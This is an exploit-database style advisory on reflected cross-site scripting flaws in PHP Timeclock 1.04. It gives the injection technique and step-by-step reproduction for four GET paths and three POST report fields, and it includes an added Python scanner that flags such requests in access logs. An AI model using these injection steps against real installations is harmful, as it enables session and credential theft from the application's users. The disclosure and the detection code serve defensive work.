Exploits / Vulnerability Discovered: 2021-05-10 | Type: webapps | Platform: php
This exploit / vulnerability, PHP Timeclock 1.04 Multiple Cross-Site Scripting (XSS), is for educational purposes only; if you use it, you do so at your own risk!
Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities.
#1: Unauthenticated Reflected XSS: Arbitrary JavaScript can be injected into the application by appending the terminating sequence /'> followed by a payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php.
Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Make a GET request to one of the four resources mentioned above
3. Append /'> and the payload to the end of the request
4. Submit the request and observe payload execution
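A detection-side check for variant #1, added here as an example and not part of the original advisory: it scans web-server access log lines for GET requests to the four listed scripts that carry extra path text containing quote or angle-bracket characters. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Script paths the advisory lists for the GET path-suffix variant (#1).
LISTED_SCRIPTS = ("/login.php", "/timeclock.php",
                  "/reports/audit.php", "/reports/timerpt.php")
# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that can close an HTML attribute or tag once reflected.
BREAKOUT_CHARS = set("'\"<>")

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2021:10:00:00 +0000] "GET /login.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/May/2021:10:00:05 +0000] "GET /login.php/%27%3ETEST HTTP/1.1" 200 5190',
    '203.0.113.9 - - [10/May/2021:10:00:09 +0000] "GET /reports/audit.php/%2527%253ETEST HTTP/1.1" 200 6001',
    '203.0.113.7 - - [10/May/2021:10:00:12 +0000] "GET /reports/timerpt.php/print HTTP/1.1" 404 310',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_suffix(log_line):
    """Return (script, suffix) when a GET to a listed script carries extra
    path text with attribute/tag breakout characters, else None."""
    match = REQUEST_RE.search(log_line)
    if not match or match.group("method") != "GET":
        return None
    # Drop the query string; only the path suffix matters for variant #1.
    path = decode_fully(match.group("target").split("?", 1)[0])
    for script in LISTED_SCRIPTS:
        idx = path.find(script + "/")
        if idx != -1:
            suffix = path[idx + len(script):]
            if BREAKOUT_CHARS & set(suffix):
                return script, suffix
    return None

def flag_lines(lines):
    """Return (line_number, script, suffix) for every flagged line."""
    hits = [(n, suspicious_suffix(line)) for n, line in enumerate(lines, 1)]
    return [(n, *hit) for n, hit in hits if hit]

if __name__ == "__main__":
    print(flag_lines(SAMPLE_LOG))
```

Access logs normally do not record request bodies, so this check covers only the GET variant; the from_date and to_date POST variant needs body-level inspection at a WAF or in the application.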
#2: Unauthenticated Reflected XSS: Arbitrary JavaScript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.
Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Create a report at one of the vulnerable directories noted above
3. Intercept the request with a proxy tool like Burp Suite
4. Inject the payload into the from_date or to_date fields